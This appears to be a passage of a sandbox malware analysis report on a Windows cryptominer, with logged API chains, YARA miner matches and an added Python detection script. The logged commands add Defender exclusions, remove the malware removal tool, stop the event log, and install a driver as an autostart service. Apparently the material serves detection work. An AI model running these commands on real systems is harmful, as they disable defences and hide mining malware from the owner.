          Source: C:\Windows\System32\dialer.exe | Code function: 42_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle
          Source: C:\Windows\System32\dialer.exe | Code function: 44_2_0000000140001394 NtQueryFullAttributesFile
          Source: C:\Windows\System32\svchost.exe | Code function: 50_2_00000254A27D202C NtQuerySystemInformation,StrCmpNIW
          Source: C:\ProgramData\IGaming\driver.exe | File created: C:\Windows\TEMP\ftnvuqwjtdwb.sys
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File deleted: C:\Windows\Temp\__PSScriptPolicyTest_qekbdbcu.ayg.ps1
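The evidence in this section carries three behaviours worth turning into detections: the dialer.exe function that opens a process, inspects its token, then calls VirtualAllocEx, WriteProcessMemory and NtCreateThreadEx in that order (the remote-thread injection primitive behind the "Writes to foreign memory regions" and "Creates a thread in another existing process" signatures); file.exe launching powercfg.exe to zero the hibernate timeout; and driver.exe dropping a .sys file into C:\Windows\TEMP. The Python below is an added example, not code from the report or from the analysed sample. It parses the three line shapes used above ("Process created:", "Code function:", "File created:"), fed in as constructed sample input copied from the report, and applies one check to each. The rule names and the alternative API names accepted at each step of the chain are this example's own choices.

```python
"""Behavioural checks over Joe Sandbox 'System Summary' evidence lines (added example)."""
import re
from dataclasses import dataclass
from typing import Iterable, List, Sequence, Set

# Constructed sample input: evidence lines copied from the report above.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0",
    r"Source: C:\Windows\System32\dialer.exeCode function: 14_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,14_2_00000001400010C0",
    r"Source: C:\Windows\System32\lsass.exeCode function: 27_2_00000140AE86202C NtQuerySystemInformation,StrCmpNIW,27_2_00000140AE86202C",
    r"Source: C:\ProgramData\IGaming\driver.exeFile created: C:\Windows\TEMP\ftnvuqwjtdwb.sysJump to behavior",
]

# The report fuses the source column onto the detail column and repeats the
# function id at the end of each "Code function" line; the regexes undo both.
PROC_RE = re.compile(r"^Source: (?P<src>.+?)Process created: (?P<image>\S+) (?P<cmdline>.+)$")
CODE_RE = re.compile(r"^Source: (?P<src>.+?)Code function: (?P<fid>\S+) (?P<apis>.+?)(?:,(?P=fid))?$")
FILE_RE = re.compile(r"^Source: (?P<src>.+?)File created: (?P<path>.+?)(?:Jump to behavior)?$")

# Ordered remote-thread injection chain; each step lists the Win32 call and the
# native equivalent so an import-hiding variant still matches (our choice).
INJECTION_CHAIN: Sequence[Set[str]] = (
    {"OpenProcess", "NtOpenProcess"},
    {"VirtualAllocEx", "NtAllocateVirtualMemory"},
    {"WriteProcessMemory", "NtWriteVirtualMemory"},
    {"CreateRemoteThread", "CreateRemoteThreadEx", "NtCreateThreadEx", "RtlCreateUserThread"},
)

# powercfg /x (alias of /change) setting any sleep/hibernate/monitor/disk timeout to 0.
POWERCFG_RE = re.compile(r"-(?:hibernate|standby|monitor|disk)-timeout-(?:ac|dc)\s+0\b", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    rule: str
    source: str
    detail: str


def in_order(apis: Sequence[str], chain: Sequence[Set[str]]) -> bool:
    """True if one call from every step of `chain` occurs in `apis`, in order, gaps allowed."""
    pos = 0
    for step in chain:
        while pos < len(apis) and apis[pos] not in step:
            pos += 1
        if pos == len(apis):
            return False
        pos += 1  # the next step must come strictly after this match
    return True


def analyse(lines: Iterable[str]) -> List[Finding]:
    """Apply the three checks; rule names are this example's own."""
    findings: List[Finding] = []
    for line in lines:
        if m := PROC_RE.match(line):
            image = m["image"].rsplit("\\", 1)[-1].lower()
            if image == "powercfg.exe" and POWERCFG_RE.search(m["cmdline"]):
                findings.append(Finding("powercfg_timeout_zeroed", m["src"], m["cmdline"]))
        elif m := CODE_RE.match(line):
            apis = m["apis"].split(",")
            # The token queries (OpenProcessToken, GetSidSubAuthority) between
            # OpenProcess and VirtualAllocEx are tolerated by the gap rule.
            if in_order(apis, INJECTION_CHAIN):
                findings.append(Finding("remote_thread_injection_chain", m["src"], m["fid"]))
        elif m := FILE_RE.match(line):
            path = m["path"]
            if path.lower().endswith(".sys") and "\\temp\\" in path.lower():
                findings.append(Finding("driver_dropped_to_temp", m["src"], path))
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_LINES):
        print(f"{f.rule:32} {f.source}  {f.detail}")
```

On the sample lines this flags the two dialer.exe functions' API chain, the powercfg command line and the driver written to TEMP, while the lsass.exe function (NtQuerySystemInformation, StrCmpNIW) produces nothing. The ordered-subsequence match is deliberately loose: it fires on the chain regardless of the housekeeping calls between steps, which is what makes it survive the token-inspection calls this sample inserts before the write.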
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF749F43B60
          Source: C:\Windows\System32\dialer.exe | Code function: 14_2_000000014000226C
          Source: C:\Windows\System32\dialer.exe | Code function: 14_2_00000001400014D8
          Source: C:\Windows\System32\dialer.exe | Code function: 14_2_0000000140002560
          Source: C:\Windows\System32\winlogon.exe | Code function: 21_2_000001E858951F2C
          Source: C:\Windows\System32\winlogon.exe | Code function: 21_2_000001E8589638A8
          Source: C:\Windows\System32\winlogon.exe | Code function: 21_2_000001E85895D0E0
          Source: C:\Windows\System32\winlogon.exe | Code function: 21_2_000001E858982B2C
          Source: C:\Windows\System32\winlogon.exe | Code function: 21_2_000001E8589944A8
          Source: C:\Windows\System32\winlogon.exe | Code function: 21_2_000001E85898DCE0
          Source: C:\Windows\System32\winlogon.exe | Code function: 21_2_000001E8589B1F2C
          Source: C:\Windows\System32\winlogon.exe | Code function: 21_2_000001E8589C38A8
          Source: C:\Windows\System32\winlogon.exe | Code function: 21_2_000001E8589BD0E0
          Source: C:\ProgramData\IGaming\driver.exe | Code function: 26_2_00007FF7F4F23B60
          Source: C:\Windows\System32\lsass.exe | Code function: 27_2_00000140ADFC1F2C
          Source: C:\Windows\System32\lsass.exe | Code function: 27_2_00000140ADFCD0E0
          Source: C:\Windows\System32\lsass.exe | Code function: 27_2_00000140ADFD38A8
          Source: C:\Windows\System32\lsass.exe | Code function: 27_2_00000140AE86DCE0
          Source: C:\Windows\System32\lsass.exe | Code function: 27_2_00000140AE8744A8
          Source: C:\Windows\System32\lsass.exe | Code function: 27_2_00000140AE862B2C
          Source: C:\Windows\System32\svchost.exe | Code function: 30_2_00000195DD59D0E0
          Source: C:\Windows\System32\svchost.exe | Code function: 30_2_00000195DD5A38A8
          Source: C:\Windows\System32\svchost.exe | Code function: 30_2_00000195DD591F2C
          Source: C:\Windows\System32\svchost.exe | Code function: 30_2_00000195DD5CDCE0
          Source: C:\Windows\System32\svchost.exe | Code function: 30_2_00000195DD5D44A8
          Source: C:\Windows\System32\svchost.exe | Code function: 30_2_00000195DD5C2B2C
          Source: C:\Windows\System32\dwm.exe | Code function: 31_2_000001160C9E1F2C
          Source: C:\Windows\System32\dwm.exe | Code function: 31_2_000001160C9ED0E0
          Source: C:\Windows\System32\dwm.exe | Code function: 31_2_000001160C9F38A8
          Source: C:\Windows\System32\dwm.exe | Code function: 31_2_000001160CA12B2C
          Source: C:\Windows\System32\dwm.exe | Code function: 31_2_000001160CA1DCE0
          Source: C:\Windows\System32\dwm.exe | Code function: 31_2_000001160CA244A8
          Source: C:\Windows\System32\dialer.exe | Code function: 42_2_000000014000226C
          Source: C:\Windows\System32\dialer.exe | Code function: 42_2_00000001400014D8
          Source: C:\Windows\System32\dialer.exe | Code function: 42_2_0000000140002560
          Source: C:\Windows\System32\dialer.exe | Code function: 44_2_0000000140003160
          Source: C:\Windows\System32\dialer.exe | Code function: 44_2_00000001400026E0
          Source: C:\Windows\System32\svchost.exe | Code function: 46_2_00000257E10838A8
          Source: C:\Windows\System32\svchost.exe | Code function: 46_2_00000257E107D0E0
          Source: C:\Windows\System32\svchost.exe | Code function: 46_2_00000257E1071F2C
          Source: C:\Windows\System32\svchost.exe | Code function: 46_2_00000257E10B44A8
          Source: C:\Windows\System32\svchost.exe | Code function: 46_2_00000257E10ADCE0
          Source: C:\Windows\System32\svchost.exe | Code function: 46_2_00000257E10A2B2C
          Source: C:\Windows\System32\svchost.exe | Code function: 47_2_000001F28C1E38A8
          Source: C:\Windows\System32\svchost.exe | Code function: 47_2_000001F28C1DD0E0
          Source: C:\Windows\System32\svchost.exe | Code function: 47_2_000001F28C1D1F2C
          Source: C:\Windows\System32\svchost.exe | Code function: 47_2_000001F28C9444A8
          Source: C:\Windows\System32\svchost.exe | Code function: 47_2_000001F28C93DCE0
          Source: C:\Windows\System32\svchost.exe | Code function: 47_2_000001F28C932B2C
          Source: C:\Windows\System32\svchost.exe | Code function: 48_2_000001CA97FD1F2C
          Source: C:\Windows\System32\svchost.exe | Code function: 48_2_000001CA97FDD0E0
          Source: C:\Windows\System32\svchost.exe | Code function: 48_2_000001CA97FE38A8
          Source: C:\Windows\System32\svchost.exe | Code function: 48_2_000001CA98542B2C
          Source: C:\Windows\System32\svchost.exe | Code function: 48_2_000001CA9854DCE0
          Source: C:\Windows\System32\svchost.exe | Code function: 48_2_000001CA985544A8
          Source: C:\Windows\System32\svchost.exe | Code function: 49_2_000001D2652F38A8
          Source: C:\Windows\System32\svchost.exe | Code function: 49_2_000001D2652ED0E0
          Source: C:\Windows\System32\svchost.exe | Code function: 49_2_000001D2652E1F2C
          Source: C:\Windows\System32\svchost.exe | Code function: 49_2_000001D2653244A8
          Source: C:\Windows\System32\svchost.exe | Code function: 49_2_000001D26531DCE0
          Source: C:\Windows\System32\svchost.exe | Code function: 49_2_000001D26532AEC2
          Source: C:\Windows\System32\svchost.exe | Code function: 49_2_000001D265312B2C
          Source: C:\Windows\System32\svchost.exe | Code function: 50_2_00000254A27D2B2C
          Source: C:\Windows\System32\svchost.exe | Code function: 50_2_00000254A27E44A8
          Source: C:\Windows\System32\svchost.exe | Code function: 50_2_00000254A27DDCE0
          Source: C:\Windows\System32\svchost.exe | Code function: 51_2_0000024B87DDDCE0
          Source: C:\Windows\System32\svchost.exe | Code function: 51_2_0000024B87DE44A8
          Source: C:\Windows\System32\svchost.exe | Code function: 51_2_0000024B87DD2B2C
          Source: C:\Windows\System32\svchost.exe | Code function: 52_2_00000205FB3CD0E0
          Source: C:\Windows\System32\svchost.exe | Code function: 52_2_00000205FB3D38A8
          Source: C:\Windows\System32\svchost.exe | Code function: 52_2_00000205FB3C1F2C
          Source: C:\Windows\System32\svchost.exe | Code function: 52_2_00000205FD402B2C
          Source: C:\Windows\System32\svchost.exe | Code function: 52_2_00000205FD4144A8
          Source: C:\Windows\System32\svchost.exe | Code function: 52_2_00000205FD40DCE0
          Source: C:\Windows\System32\svchost.exe | Code function: 53_2_000001A2056A2B2C
          Source: C:\Windows\System32\svchost.exe | Code function: 53_2_000001A2056ADCE0
          Source: C:\Windows\System32\svchost.exe | Code function: 53_2_000001A2056B44A8
          Source: C:\Windows\System32\svchost.exeCode function: 54_2_0000018EC1F3D0E054_2_0000018EC1F3D0E0
          Source: C:\Windows\System32\svchost.exeCode function: 54_2_0000018EC1F438A854_2_0000018EC1F438A8
          Source: C:\Windows\System32\svchost.exeCode function: 54_2_0000018EC1F31F2C54_2_0000018EC1F31F2C
          Source: C:\Windows\System32\svchost.exeCode function: 54_2_0000018EC1F6DCE054_2_0000018EC1F6DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 54_2_0000018EC1F744A854_2_0000018EC1F744A8
          Source: C:\Windows\System32\svchost.exeCode function: 54_2_0000018EC1F62B2C54_2_0000018EC1F62B2C
          Source: C:\Windows\System32\svchost.exeCode function: 55_2_0000025CE3BCD0E055_2_0000025CE3BCD0E0
          Source: C:\Windows\System32\svchost.exeCode function: 55_2_0000025CE3BD38A855_2_0000025CE3BD38A8
          Source: C:\Windows\System32\svchost.exeCode function: 55_2_0000025CE3BC1F2C55_2_0000025CE3BC1F2C
          Source: C:\Windows\System32\svchost.exeCode function: 55_2_0000025CE3E0DCE055_2_0000025CE3E0DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 55_2_0000025CE3E144A855_2_0000025CE3E144A8
          Source: C:\Windows\System32\svchost.exeCode function: 55_2_0000025CE3E02B2C55_2_0000025CE3E02B2C
          Source: C:\Windows\System32\svchost.exeCode function: 56_2_0000026238951F2C56_2_0000026238951F2C
          Source: C:\Windows\System32\svchost.exeCode function: 56_2_00000262389638A856_2_00000262389638A8
          Source: C:\Windows\System32\svchost.exeCode function: 56_2_000002623895D0E056_2_000002623895D0E0
          Source: C:\Windows\System32\svchost.exeCode function: 56_2_0000026238982B2C56_2_0000026238982B2C
          Source: C:\Windows\System32\svchost.exeCode function: 56_2_00000262389944A856_2_00000262389944A8
          Source: C:\Windows\System32\svchost.exeCode function: 56_2_000002623898DCE056_2_000002623898DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 57_2_000002786E561F2C57_2_000002786E561F2C
          Source: C:\Windows\System32\svchost.exeCode function: 57_2_000002786E56D0E057_2_000002786E56D0E0
          Source: C:\Windows\System32\svchost.exeCode function: 57_2_000002786E5738A857_2_000002786E5738A8
          Source: C:\Windows\System32\svchost.exeCode function: 57_2_000002786E592B2C57_2_000002786E592B2C
          Source: C:\Windows\System32\svchost.exeCode function: 57_2_000002786E59DCE057_2_000002786E59DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 57_2_000002786E5A44A857_2_000002786E5A44A8
          Source: C:\Windows\System32\svchost.exeCode function: 58_2_000001611FF7D0E058_2_000001611FF7D0E0
          Source: C:\Windows\System32\svchost.exeCode function: 58_2_000001611FF838A858_2_000001611FF838A8
          Source: C:\Windows\System32\svchost.exeCode function: 58_2_000001611FF71F2C58_2_000001611FF71F2C
          Source: C:\Windows\System32\svchost.exeCode function: 58_2_000001611FFADCE058_2_000001611FFADCE0
          Source: C:\Windows\System32\svchost.exeCode function: 58_2_000001611FFB44A858_2_000001611FFB44A8
          Source: C:\Windows\System32\svchost.exeCode function: 58_2_000001611FFA2B2C58_2_000001611FFA2B2C
          Source: C:\Windows\System32\svchost.exeCode function: 59_2_0000027C0F3638A859_2_0000027C0F3638A8
          Source: C:\Windows\System32\svchost.exeCode function: 59_2_0000027C0F35D0E059_2_0000027C0F35D0E0
          Source: C:\Windows\System32\svchost.exeCode function: 59_2_0000027C0F351F2C59_2_0000027C0F351F2C
          Source: C:\Windows\System32\svchost.exeCode function: 59_2_0000027C0F3944A859_2_0000027C0F3944A8
          Source: C:\Windows\System32\svchost.exeCode function: 59_2_0000027C0F38DCE059_2_0000027C0F38DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 59_2_0000027C0F382B2C59_2_0000027C0F382B2C
Source: Joe Sandbox View | Dropped File: C:\Windows\Temp\ftnvuqwjtdwb.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00007FF749F41394 appears 33 times
Source: C:\ProgramData\IGaming\driver.exe | Code function: String function: 00007FF7F4F21394 appears 33 times
Source: 45.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 45.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 45.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 0000002D.00000002.3359712073.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: dialer.exe PID: 528, type: MEMORYSTR | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: System.evtx.52.dr | Binary string: C:\Device\HarddiskVolume3~(
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.52.dr | Binary string: >\Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sys
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.52.dr | Binary string: 9\Device\HarddiskVolume3\Windows\System32\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.52.dr | Binary string: J\Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
Source: System.evtx.52.dr | Binary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.52.dr | Binary string: L\Device\HarddiskVolume3\Users\user\AppData\Local\Temp\JSAMSIProvider64.dll6\Device\HarddiskVolume3\Windows\System32\SIHClient.exe
Source: System.evtx.52.dr | Binary string: C:\Device\HarddiskVolume3
Source: System.evtx.52.dr | Binary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4eb
Source: System.evtx.52.dr | Binary string: \Device\HarddiskVolume3\Windows\SysWOW64\tzutil.exe
Source: System.evtx.52.dr | Binary string: \Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exep
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.52.dr | Binary string: 1\Device\HarddiskVolume3\Windows\SysWOW64\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.52.dr | Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeH**
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.52.dr | Binary string: 4\Device\HarddiskVolume3\Windows\System32\spoolsv.exe
Source: Security.evtx.52.dr | Binary string: \Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.syst
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.52.dr | Binary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
Source: ftnvuqwjtdwb.sys.26.dr | Binary string: \Device\WinRing0_1_2_0
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.52.dr | Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.52.dr | Binary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Security.evtx.52.dr | Binary string: \Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sysF
Source: classification engine | Classification label: mal100.spyw.evad.mine.winEXE@62/72@2/2
Source: C:\Windows\System32\dialer.exe | Code function: 14_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx
Source: C:\Windows\System32\dialer.exe | Code function: 42_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx
Source: C:\Windows\System32\dialer.exe | Code function: 14_2_00000001400019C4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString
Source: C:\Windows\System32\dialer.exe | Code function: 14_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4668:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5284:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6576:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5560:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5948:120:WilError_03
Source: C:\Windows\System32\dialer.exe | Mutant created: \BaseNamedObjects\Global\ldndhoaiflkhpadl
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3560:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4308:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3168:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3176:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2072:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6480:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5040:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3712:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6508:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4956:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5312:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y4ur20yo.jej.ps1
Source: file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\dialer.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\System32\dialer.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | Virustotal: Detection: 80%
Source: file.exe | ReversingLabs: Detection: 81%
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "LightService"
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "LightService" binpath= "C:\ProgramData\IGaming\driver.exe" start= "auto"
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "LightService"
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\ProgramData\IGaming\driver.exe C:\ProgramData\IGaming\driver.exe
